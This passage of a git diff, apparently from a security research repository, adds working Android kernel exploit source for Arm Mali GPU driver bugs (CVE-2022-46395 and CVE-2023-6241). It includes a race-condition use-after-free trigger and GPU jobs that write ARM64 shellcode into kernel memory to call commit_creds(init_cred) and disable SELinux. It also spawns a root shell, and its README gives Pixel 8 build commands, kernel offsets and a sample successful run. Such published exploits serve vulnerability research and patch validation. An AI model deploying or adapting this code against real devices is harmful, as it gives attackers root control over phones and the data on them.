(void*)&(args[0])); + 
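+  //The two threads below race each other: softjob_reset triggers a kernel
+  //soft event update that writes to the imported user buffer, while
+  //unmap_resources waits until unmap_time and then frees and replaces the
+  //buffer's backing pages, so that the kernel's write lands on freed memory.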
pthread_t thread1; + pthread_create(&thread1, NULL, softjob_reset, (void*)&(args[0])); + struct sched_param sched_par = {0}; + pthread_join(thread1, NULL); + pthread_join(thread, NULL); + check_success(); + + if (success) { + LOG("finished reset: %ld fault: %ld %ld err %d read %d\n", finished_reset_time.tv_nsec, finished_fault_time.tv_nsec, finished_fault_time.tv_sec, error_code, g_initial_read); + + uint64_t alias_region = access_free_pages(mali_fd, mali_fd2, corrupted_region); + int index = 0; + int pg = find_pgd((uint64_t*)alias_region, &index); + if (pg != -1) { + LOG("found pgd at page %d\n", pg); + } else { + LOG("failed to find pgd, retry\n"); + success = 0; + need_reset_fd = 1; + close(mali_fd); + return 0; + } + uint64_t pgd = alias_region + pg * 0x1000; + atom_number = write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd, atom_number++); + return 1; + } + close(mali_fd); + return 0; +} + +int reset_mali2(int prev) { + if (prev != -1) close(prev); + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + void* tracking_page2 = setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + return mali_fd2; +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + uint64_t counter = 0; + select_offset(); + int mali_fd2 = reset_mali2(-1); + benchmark_time = benchmark(); + while (!success) { + reset(); + int ret = trigger(mali_fd2); + counter++; + if (counter % 100 == 0) { + LOG("failed after %ld\n", counter); + } + if (counter % 300 == 0) { + benchmark_time = benchmark(); + } + if (!success && need_reset_fd) { + mali_fd2 = reset_mali2(mali_fd2); + } + if (ret == 1) system("sh"); + } + LOG("success after %ld\n", counter); +} diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c new file mode 100644 index 0000000..c696832 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.c @@ -0,0 +1,160 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +#include "mem_write.h" +#include "mempool_utils.h" + +#define ADRP_INIT_INDEX 0 + +#define ADD_INIT_INDEX 1 + +#define ADRP_COMMIT_INDEX 2 + +#define ADD_COMMIT_INDEX 3 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22); + int prot = PROT_READ; + if (!read_only) { + alloc.in.flags |= BASE_MEM_PROT_GPU_WR; + prot |= PROT_WRITE; + } + alloc.in.va_pages = va_pages; + alloc.in.commit_pages = commit_pages; + mem_alloc(mali_fd, &alloc); + void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va); + if (region == MAP_FAILED) { + err(1, "mmap failed"); + } + return region; +} + +static inline uint32_t lo32(uint64_t x) { + return x & 0xffffffff; +} + +static inline uint32_t hi32(uint64_t x) { + return x >> 32; +} + +static uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { + uint64_t pc_page = pc >> 12; + uint64_t label_page = label >> 12; + int64_t offset = (label_page - pc_page) << 12; + int64_t immhi_mask = 0xffffe0; + int64_t immhi = offset >> 14; + int32_t immlo = (offset >> 12) & 0x3; + uint32_t adpr = rd & 0x1f; + adpr |= (1 << 28); + adpr |= (1 << 31); //op + adpr |= immlo << 29; + adpr |= (immhi_mask 
& (immhi << 5)); + return adpr; +} + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code) { + + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + //Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = init_adpr; + root_code[ADD_INIT_INDEX] = add_init; + //Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); + root_code[ADD_COMMIT_INDEX] = add_commit; + root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xd63f0100; // blr x8 + root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xd65f03c0; // ret +} + +static uint64_t set_addr_lv3(uint64_t addr) { + uint64_t pfn = addr >> PAGE_SHIFT; + pfn &= ~ 0x1FFUL; + pfn |= 0x100UL; + return pfn << PAGE_SHIFT; +} + +static inline uint64_t compute_pt_index(uint64_t addr, int level) { + uint64_t vpfn = addr >> PAGE_SHIFT; + vpfn >>= (3 - level) * 9; + return vpfn & 0x1FF; +} + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) { + void* jc_region = map_gpu(mali_fd, 1, 1, false, 0); + struct MALI_JOB_HEADER jh = {0}; + jh.is_64b = true; + jh.type = MALI_JOB_TYPE_WRITE_VALUE; + + struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0}; + payload.type = type; + payload.immediate_value = value; + payload.address = gpu_addr; + + MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh); + MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload); + uint32_t* section = (uint32_t*)jc_region; + struct base_jd_atom_v2 atom = {0}; + atom.jc = (uint64_t)jc_region; + atom.atom_number = atom_number; + atom.core_req = BASE_JD_REQ_CS; + struct kbase_ioctl_job_submit submit = {0}; + submit.addr = (uint64_t)(&atom); + submit.nr_atoms = 1; + submit.stride = sizeof(struct base_jd_atom_v2); + if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { + err(1, "submit job failed\n"); + } + usleep(10000); +} + +uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number) { + uint64_t func_offset = (func + KERNEL_BASE) % 0x1000; + uint64_t curr_overwrite_addr = 0; + for (int i = 0; i < size; i++) { + uint64_t base = reserved[i]; + uint64_t end = reserved[i] + reserved_size * 0x1000; + uint64_t start_idx = compute_pt_index(base, 3); + uint64_t end_idx = compute_pt_index(end, 3); + for (uint64_t addr = base; addr < end; addr += 0x1000) { + uint64_t overwrite_addr = set_addr_lv3(addr); + if (curr_overwrite_addr != overwrite_addr) { + LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset); + curr_overwrite_addr = overwrite_addr; + for (int code = code_size - 1; code >= 0; code--) { + write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); + } + usleep(300000); + } + } + } + return atom_number; +} + +uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + return atom_number; +} + +int run_enforce() { + char result = '2'; + sleep(3); + int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY); + read(enforce_fd, &result, 1); + close(enforce_fd); + LOG("result %d\n", result); + return result; +} + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h 
b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h new file mode 100644 index 0000000..17bc0c5 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mem_write.h @@ -0,0 +1,27 @@ +#ifndef MEM_WRITE_H +#define MEM_WRITE_H + +#include +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "midgard.h" +#include "log_utils.h" + +#define KERNEL_BASE 0x80000000 + +#define PAGE_SHIFT 12 + +#define OVERWRITE_INDEX 256 + +void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group); + +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit, uint32_t* root_code); + +void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type); + +uint8_t write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size, uint64_t reserved_size, uint8_t atom_number); + +uint8_t cleanup(int mali_fd, uint64_t pgd, uint8_t atom_number); + +int run_enforce(); +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c new file mode 100644 index 0000000..9a7f134 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.c @@ -0,0 +1,61 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include + +#include "mempool_utils.h" + +#define POOL_SIZE 16384 + +void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) { + if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) { + err(1, "mem_alloc failed\n"); + } +} + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = pages; + alloc.in.commit_pages = pages; + mem_alloc(mali_fd, &alloc); + reserved_va[i] = alloc.out.gpu_va; + } +} + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) { + for (int i = 0; i < nents; i++) { + void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]); + if (reserved == MAP_FAILED) { + err(1, "mmap reserved failed %d\n", i); + } + reserved_va[i] = (uint64_t)reserved; + } +} + +uint64_t drain_mem_pool(int mali_fd) { + union kbase_ioctl_mem_alloc alloc = {0}; + alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22); + int prot = PROT_READ | PROT_WRITE; + alloc.in.va_pages = POOL_SIZE; + alloc.in.commit_pages = POOL_SIZE; + mem_alloc(mali_fd, &alloc); + return alloc.out.gpu_va; +} + +void release_mem_pool(int mali_fd, uint64_t drain) { + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain}; + if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) { + err(1, "free_mem failed\n"); + } +} + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h new file mode 100644 index 0000000..4115669 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mempool_utils.h @@ -0,0 +1,19 @@ +#ifndef MEMPOOL_UTILS_H +#define MEMPOOL_UTILS_H + +#include +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "log_utils.h" + +void mem_alloc(int fd, union 
kbase_ioctl_mem_alloc* alloc); + +void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va); + +uint64_t drain_mem_pool(int mali_fd); + +void release_mem_pool(int mali_fd, uint64_t drain); + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h new file mode 100644 index 0000000..e0ce432 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/midgard.h @@ -0,0 +1,260 @@ +#ifndef MIDGARD_H +#define MIDGARD_H + +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone + +#include +#include +#include +#include +#include +#include +#include + +#define pan_section_ptr(base, A, S) \ + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET)) + +#define pan_section_pack(dst, A, S, name) \ + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \ + *_loop_terminate = (void *) (dst); \ + __builtin_expect(_loop_terminate != NULL, 1); \ + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \ + _loop_terminate = NULL; })) + + +static inline uint64_t +__gen_uint(uint64_t v, uint32_t start, uint32_t end) +{ +#ifndef NDEBUG + const int width = end - start + 1; + if (width < 64) { + const uint64_t max = (1ull << width) - 1; + assert(v <= max); + } +#endif + + return v << start; +} + +static inline uint64_t +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) +{ + uint64_t val = 0; + const int width = end - start + 1; + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + 
__gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * +mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? 
"true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent) +{ + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address); + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type)); + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value); +} + +struct mali_write_value_job_packed { + uint32_t opaque[14]; +}; + +#define MALI_JOB_HEADER_header \ + .is_64b = true + +#define MALI_WRITE_VALUE_JOB_LENGTH 56 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/README.md b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md new file mode 100644 index 
0000000..52e34ce
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2023_6241/README.md
@@ -0,0 +1,40 @@
+## Exploit for CVE-2023-6241
+
+The write-up can be found [here](https://github.blog/2024-03-18-gaining-kernel-code-execution-on-an-mte-enabled-pixel-8). This is a bug in the Arm Mali kernel driver that I reported in November 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which can then be used to disable SELinux and gain root.
+
+The exploit has been tested on the Google Pixel 8 with the November 2023 patch (`UD1A.231105.004`). It needs to be compiled with OpenCL and linked against the OpenCL library `libGLES_mali.so`. The library can be found on a Pixel 8 device at `vendor/lib64/egl/libGLES_mali.so`, and the OpenCL header files can be found in the Khronos Group's [OpenCL-Headers repository](https://github.com/KhronosGroup/OpenCL-Headers). The specific headers that I used were the [v2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17) release, although other versions should also work. For reference, I used the following command to compile with clang in ndk-26:
+
+```
+android-ndk-r26b/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf
+```
+
+At runtime the exploit must be able to find `libGLES_mali.so`; this can be done by setting `LD_LIBRARY_PATH` to `/vendor/lib64/egl`. The exploit rarely fails, and even when it does, it does not normally corrupt or crash the system, so it can simply be rerun. If successful, it should disable SELinux and gain root:
+
+```
+shiba:/data/local/tmp $ LD_LIBRARY_PATH=/vendor/lib64/egl ./mali_jit_csf
+mali_fd 3
+corrupted_jit_addr 6000001000
+kernel success
+kernel success
+queue kernel
+jit_grow addr 6000001000
+Size after grow: 22f6
+Final grow size: 23c7
+keep alive jit_addr 60023d1000
+Size after free: 21fd, trim_level 6
+writing to gpu_va 6002301000
+found reused page 5fffef6000, 0
+pgd entry found at index 0 40000899bbc443
+overwrite addr : 5ffff00b50 b50
+overwrite addr : 5fffb00b50 b50
+overwrite addr : 5fff900b50 b50
+overwrite addr : 5ffff00714 714
+overwrite addr : 5fffb00714 714
+overwrite addr : 5fff900714 714
+result 50
+clean up
+```
+
+When running for the first time, the exploit sometimes stalls after printing the last `overwrite addr` message. If that happens (stalled for more than 10 seconds; pausing for a few seconds is normal), simply kill the exploit and rerun it. It should not stall the second time.
+
+To test it with MTE enabled, follow [these instructions](https://outflux.net/blog/archives/2023/10/26/enable-mte-on-pixel-8/) to enable kernel MTE.
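+
+As a quick sanity check that the headers and library are wired up correctly before running the exploit itself, a minimal OpenCL probe like the one below can be built with the same clang command. This snippet is illustrative only and not part of the exploit; it simply confirms that `libGLES_mali.so` can be loaded and that a GPU device is visible.
+
+```
+#include <stdio.h>
+#include <CL/cl.h>
+
+int main(void) {
+  cl_platform_id platform;
+  cl_device_id device;
+  char name[256] = {0};
+  //One platform with one GPU device is expected on a stock Pixel 8.
+  if (clGetPlatformIDs(1, &platform, NULL) != CL_SUCCESS ||
+      clGetDeviceIDs(platform, CL_DEVICE_TYPE_GPU, 1, &device, NULL) != CL_SUCCESS) {
+    fprintf(stderr, "no OpenCL GPU device found\n");
+    return 1;
+  }
+  clGetDeviceInfo(device, CL_DEVICE_NAME, sizeof(name) - 1, name, NULL);
+  printf("GPU device: %s\n", name); //should report a Mali GPU
+  return 0;
+}
+```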
diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h new file mode 100644 index 0000000..30f6699 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/firmware_offsets.h @@ -0,0 +1,16 @@ +#ifndef FIRMWARE_OFFSETS_H +#define FIRMWARE_OFFSETS_H + +#define AVC_DENY_2311 0x806b50 + +#define SEL_READ_ENFORCE_2311 0x818714 + +#define INIT_CRED_2311 0x271bfa8 + +#define COMMIT_CREDS_2311 0x167b40 + +#define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40 + +#define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h new file mode 100644 index 0000000..23bed51 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h @@ -0,0 +1,228 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_COMMON_KERNEL_H_ +#define _UAPI_BASE_COMMON_KERNEL_H_ + +#include +#include "mali_base_kernel.h" + +#define LOCAL_PAGE_SHIFT 12 + +#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4 + +/* Memory allocation, access/hint flags & mask. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define 